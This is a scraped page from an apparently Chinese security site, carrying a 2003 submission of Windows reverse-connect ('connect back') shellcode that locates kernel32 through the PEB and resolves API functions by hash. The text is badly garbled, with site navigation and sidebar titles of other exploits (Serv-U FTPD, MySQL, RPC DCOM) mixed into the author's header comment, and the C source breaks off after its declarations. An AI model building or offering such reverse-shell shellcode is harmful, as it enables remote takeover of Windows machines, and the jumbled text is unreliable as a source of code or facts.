利用hash值取得函数地址connect back shellcode.pdfVIP

主页 安全文档 安全工具 安全漏洞 漏洞利用 红盟作品 开放项目 红盟社 区 关于我们 递交作品 作品总数 个 本类作品 个 关键字 所有分类 搜索 : 38 : 19 快速通道 利用hash值取得函数地址的connect back shellcode. 文档分类 提交作品： lion 软件作品 提交日期： 2003-09-17 文档作品 代码作品 作品属性： 推荐 = 文档类别： 代码作品 浏览次数： 今 次总 次 9 / 6234 推荐作品 Windows RPC DCOM DoS exploit /****************************************************************** Serv-U FTPD 2.x/3.x/4.x/5.x 作者: lion, lion@ MDTM 日期: 2003-09-17 Command 网站: Rem... Mysql 3.23.x/4.0.x 此shellcode特点: remote exploit 通过 取得 地址 a. peb kernel32.dll download 通过函数的 值来进行比较 代替 取得函数地址 b. hash , GetProcAddress url file shellcode for c. 反连接功能 win2k/xp d. win2000/xp测试成功 利用hash 值取得函数地 参考资料: 址的connect /documents/winasm-1.0.1.pdf back /sc/win32_reverse.asm shellcode. 分析理解 ******************************************************************* elf文件并且自 动编排 shellcode的 #include stdio.h 程序 #include windows.h //#include winsock2.h //#pragma comment(lib, ws2_32) void shellcode(); void printsc(unsigned char *sc, int len); DWORD addr; unsigned char hash[0x300] = {0}; unsigned char sc[0x1000]; // 要打印hash的函数列表 unsigned char buff[]=